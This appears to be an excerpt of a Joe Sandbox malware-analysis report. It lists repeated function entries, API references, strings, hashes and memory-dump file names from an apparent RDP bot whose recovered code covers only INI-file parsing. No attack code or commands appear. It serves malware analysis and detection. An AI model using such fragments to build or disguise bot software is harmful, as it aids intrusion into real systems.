Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1991603811
Opcode ID: 7b3c9434b910145414a894f18d096616f5266deb4f2524f64a9b031aeacdc748
Instruction ID: 4eb5e0878130dffa685a4d280bd85fee9a031a0b7f13d166ebdf697a14a3d6ea
Opcode Fuzzy Hash: 7b3c9434b910145414a894f18d096616f5266deb4f2524f64a9b031aeacdc748
Instruction Fuzzy Hash: 58219127B0AA4782F7929B11E9607AA77A0FB847E8F404031EE4C077A6DF3DD845C709

Function 00007FFDA55AD824 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDA55AD8C0
_strtoui64.MSVCRT ref: 00007FFDA55AD8D6
_errno.MSVCRT ref: 00007FFDA55AD8E0
_errno.MSVCRT ref: 00007FFDA55AD8EC

Strings

(value != NULL), xrefs: 00007FFDA55AD898
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AD8A6
ini_get_uint64, xrefs: 00007FFDA55AD89F, 00007FFDA55AD90C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55AD891
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDA55AD913

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: af583f79c4fcf5353667909058698f50e495094c839aaac9be843fdc2d8586ea
Instruction ID: 924d7d241d19345b7a744ad654d347f046fe76a931db570c66df4b110e621d2c
Opcode Fuzzy Hash: af583f79c4fcf5353667909058698f50e495094c839aaac9be843fdc2d8586ea
Instruction Fuzzy Hash: 0F21D025B0AA4F95E712AF15FC647AA3360BB46B84F440036EE4C477A6DF3DD945C708

Function 00007FFDA55DAD94 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDA55DAE30
_strtoui64.MSVCRT ref: 00007FFDA55DAE46
_errno.MSVCRT ref: 00007FFDA55DAE50
_errno.MSVCRT ref: 00007FFDA55DAE5C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDA55DAE83
ini_get_uint64, xrefs: 00007FFDA55DAE0F, 00007FFDA55DAE7C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55DAE01
(value != NULL), xrefs: 00007FFDA55DAE08
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55DAE16

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 730a57a45b21505463e24f21592d21c58803fcc4494c9fa5138c3aaa1cac760c
Instruction ID: cec9b3293d0c7a7c89cb01993e11b4a0b7dfe5b10a34bc94ec645233223d8d52
Opcode Fuzzy Hash: 730a57a45b21505463e24f21592d21c58803fcc4494c9fa5138c3aaa1cac760c
Instruction Fuzzy Hash: 9A216D67B1AA8AD5E212DF15E8507AA23A0EB4AB84F444032EE4C47766DF3CD955C704

Function 00007FFDAC0F2324 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDAC0F23C0
_strtoui64.MSVCRT ref: 00007FFDAC0F23D6
_errno.MSVCRT ref: 00007FFDAC0F23E0
_errno.MSVCRT ref: 00007FFDAC0F23EC

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDAC0F2413
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC0F2391
(value != NULL), xrefs: 00007FFDAC0F2398
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC0F23A6
ini_get_uint64, xrefs: 00007FFDAC0F239F, 00007FFDAC0F240C

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 39e38a57139edd1975c326b3cb320ea4fca86ff0345f0a920947b35f90d8c6bf
Instruction ID: 2f3695fd6f6435be7c8220f793141c64d6f2239e919c89103c07d069d7b2b0a1
Opcode Fuzzy Hash: 39e38a57139edd1975c326b3cb320ea4fca86ff0345f0a920947b35f90d8c6bf
Instruction Fuzzy Hash: 7421ABA2B0AA4389E7129F15FC507AA23A1FB457E4F484032EE8C47766CF7CD985D748

Function 00007FFDA55751C4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDA5575260
_strtoui64.MSVCRT ref: 00007FFDA5575276
_errno.MSVCRT ref: 00007FFDA5575280
_errno.MSVCRT ref: 00007FFDA557528C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDA55752B3
(value != NULL), xrefs: 00007FFDA5575238
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5575246
ini_get_uint64, xrefs: 00007FFDA557523F, 00007FFDA55752AC
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5575231

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: fb2c5f8eb68c6f532567d251cdbef5bf6d7f4981018d47d77449ccd008b35209
Instruction ID: 9f544daa92a01d082aae0f4a93ee33f5599b083b6aaa142f1301db18990d8673
Opcode Fuzzy Hash: fb2c5f8eb68c6f532567d251cdbef5bf6d7f4981018d47d77449ccd008b35209
Instruction Fuzzy Hash: F021D06A70EA4BD6E3528F55F8507AA33A0BB56B84F844032EE4C07762DF3CE845D708

Function 00007FFDA5BA1D84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDA5BA1E20
_strtoui64.MSVCRT ref: 00007FFDA5BA1E36
_errno.MSVCRT ref: 00007FFDA5BA1E40
_errno.MSVCRT ref: 00007FFDA5BA1E4C

Strings

ini_get_uint64, xrefs: 00007FFDA5BA1DFF, 00007FFDA5BA1E6C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5BA1E06
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5BA1DF1
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDA5BA1E73
(value != NULL), xrefs: 00007FFDA5BA1DF8

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 0cf6c5a104619dcc860f5f8e98ebeb390f6b58a9fd0989ccc1a454da9a2e6fd0
Instruction ID: b36edaaeb67b3b844a5f750d6d1f1897ebeeca0e15ed4fb109ecabdb4e395c01
Opcode Fuzzy Hash: 0cf6c5a104619dcc860f5f8e98ebeb390f6b58a9fd0989ccc1a454da9a2e6fd0
Instruction Fuzzy Hash: ED21F621B0AA8F86EB508F14F8507AA7361BB46B85F448032EE8D47762DF7DE849C304

Function 00007FFDAC128774 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDAC128810
_strtoui64.MSVCRT ref: 00007FFDAC128826
_errno.MSVCRT ref: 00007FFDAC128830
_errno.MSVCRT ref: 00007FFDAC12883C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC1287F6
(value != NULL), xrefs: 00007FFDAC1287E8
ini_get_uint64, xrefs: 00007FFDAC1287EF, 00007FFDAC12885C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC1287E1
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDAC128863

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 9dd2d07f19f7bb78d8c530cd41200e9f5a3a17d9f828d2801ea5e2be8c310e9f
Instruction ID: 56c8daa0dab08c8177327e91f02670ee99b5debfdf28c9e96a44a21183b274f1
Opcode Fuzzy Hash: 9dd2d07f19f7bb78d8c530cd41200e9f5a3a17d9f828d2801ea5e2be8c310e9f
Instruction Fuzzy Hash: A521CC6770AA42C5E2529F11F8607AA23E0FB847E8F444032EE8C07756DF3CE845C705

Function 00007FFDA55AD300 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA55AD3EC

Strings

(var != NULL), xrefs: 00007FFDA55AD3A8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AD350, 00007FFDA55AD383, 00007FFDA55AD3B6
ini_get_var, xrefs: 00007FFDA55AD349, 00007FFDA55AD37C, 00007FFDA55AD3AF, 00007FFDA55AD416, 00007FFDA55AD45E
(sec != NULL), xrefs: 00007FFDA55AD342
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55AD33B, 00007FFDA55AD36E, 00007FFDA55AD3A1
(name != NULL), xrefs: 00007FFDA55AD375
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDA55AD41D
NULL, xrefs: 00007FFDA55AD47E, 00007FFDA55AD487
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDA55AD465

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 106c19c6459ba6de99c2f714aaae266b3271569f9a077c5e79c2136b899037ee
Instruction ID: 8b43bd3f248b1108b1ffe773c8e7bc94740a0879e7ccd08ae6b6ff34a89f0e50
Opcode Fuzzy Hash: 106c19c6459ba6de99c2f714aaae266b3271569f9a077c5e79c2136b899037ee
Instruction Fuzzy Hash: D2418B69B0A64F91FE129F50E9683B46260BF03B44F450932EA4D0A3D7EF7DA649C70C

Function 00007FFDA5574CA0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA5574D8C

Strings

ini_get_var, xrefs: 00007FFDA5574CE9, 00007FFDA5574D1C, 00007FFDA5574D4F, 00007FFDA5574DB6, 00007FFDA5574DFE
NULL, xrefs: 00007FFDA5574E1E, 00007FFDA5574E27
(name != NULL), xrefs: 00007FFDA5574D15
(var != NULL), xrefs: 00007FFDA5574D48
(sec != NULL), xrefs: 00007FFDA5574CE2
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDA5574E05
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5574CF0, 00007FFDA5574D23, 00007FFDA5574D56
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDA5574DBD
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5574CDB, 00007FFDA5574D0E, 00007FFDA5574D41

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 520c4cb442c3ebc73427937b641df97523420bbd38006ec49e6527b41253b669
Instruction ID: fb9a456a1d36a8f8b738ae5bd62c5c2b80eb19e2b466802eaef15c15d0564b6b
Opcode Fuzzy Hash: 520c4cb442c3ebc73427937b641df97523420bbd38006ec49e6527b41253b669
Instruction Fuzzy Hash: C0414E69B0F64FE1FA228F10E8603F46250BF56B48F844472EA8D4A396DF7CE655D308

Function 00007FFDA5BA1860 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA5BA194C

Strings

ini_get_var, xrefs: 00007FFDA5BA18A9, 00007FFDA5BA18DC, 00007FFDA5BA190F, 00007FFDA5BA1976, 00007FFDA5BA19BE
(name != NULL), xrefs: 00007FFDA5BA18D5
(sec != NULL), xrefs: 00007FFDA5BA18A2
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDA5BA19C5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDA5BA197D
NULL, xrefs: 00007FFDA5BA19DE, 00007FFDA5BA19E7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5BA18B0, 00007FFDA5BA18E3, 00007FFDA5BA1916
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5BA189B, 00007FFDA5BA18CE, 00007FFDA5BA1901
(var != NULL), xrefs: 00007FFDA5BA1908

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 3886bcf048027362acec68b809de9163c1e8a6e697dceffa47f0cd1afbcbabe4
Instruction ID: 0c1338b8f3942b7001729926263ac863ff2d855b522e3b9b0c41d1cfe7463287
Opcode Fuzzy Hash: 3886bcf048027362acec68b809de9163c1e8a6e697dceffa47f0cd1afbcbabe4
Instruction Fuzzy Hash: E9415361F0A64F96FE548B51E8203F52350BB06B46F858932EB4D063A3EF7DE54AC308

Function 00007FFDAC128250 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDAC12833C

Strings

[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDAC1283B5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC1282A0, 00007FFDAC1282D3, 00007FFDAC128306
(var != NULL), xrefs: 00007FFDAC1282F8
(sec != NULL), xrefs: 00007FFDAC128292
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDAC12836D
(name != NULL), xrefs: 00007FFDAC1282C5
ini_get_var, xrefs: 00007FFDAC128299, 00007FFDAC1282CC, 00007FFDAC1282FF, 00007FFDAC128366, 00007FFDAC1283AE
NULL, xrefs: 00007FFDAC1283CE, 00007FFDAC1283D7
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC12828B, 00007FFDAC1282BE, 00007FFDAC1282F1

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 1e5e7d716c40fda68bd4041f42aafef0815e82db2a5e351da6f34470d705bf0c
Instruction ID: 82f498b310547ccd2476e9c8e54e020e1ea2ef26b84175537d077d3a2a37981e
Opcode Fuzzy Hash: 1e5e7d716c40fda68bd4041f42aafef0815e82db2a5e351da6f34470d705bf0c
Instruction Fuzzy Hash: 41412A6BB0AA47D5FA529B51EA603F962E0FB543E8F448032DA4C06397DF3CE945C349

Function 00007FFDA55AD179 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA55AD26D

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AD1C9, 00007FFDA55AD1FC, 00007FFDA55AD22F
ini_get_sec, xrefs: 00007FFDA55AD1C2, 00007FFDA55AD1F5, 00007FFDA55AD228, 00007FFDA55AD286, 00007FFDA55AD2C4
(sec != NULL), xrefs: 00007FFDA55AD221
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55AD1B4, 00007FFDA55AD1E7, 00007FFDA55AD21A
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDA55AD2CB
(name != NULL), xrefs: 00007FFDA55AD1EE
[D] (%s) -> Done(name=%s), xrefs: 00007FFDA55AD28D
NULL, xrefs: 00007FFDA55AD2E4
(ini != NULL), xrefs: 00007FFDA55AD1BB

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 377e8652e17eed6466362e1f55ec8f66dbc5ffa75ed2dd203fb680f462ad1773
Instruction ID: a263582d1d333018f43001a1cd65653533deab65e36d873c106991c20493d36e
Opcode Fuzzy Hash: 377e8652e17eed6466362e1f55ec8f66dbc5ffa75ed2dd203fb680f462ad1773
Instruction Fuzzy Hash: 0D414DA9B0AA4F91FE12AF80A8683B42250BF47B48F454536DA4C163E3EF3DE545C70C

Function 00007FFDA5574B19 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA5574C0D

Strings

NULL, xrefs: 00007FFDA5574C84
(name != NULL), xrefs: 00007FFDA5574B8E
ini_get_sec, xrefs: 00007FFDA5574B62, 00007FFDA5574B95, 00007FFDA5574BC8, 00007FFDA5574C26, 00007FFDA5574C64
(ini != NULL), xrefs: 00007FFDA5574B5B
(sec != NULL), xrefs: 00007FFDA5574BC1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5574B69, 00007FFDA5574B9C, 00007FFDA5574BCF
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDA5574C6B
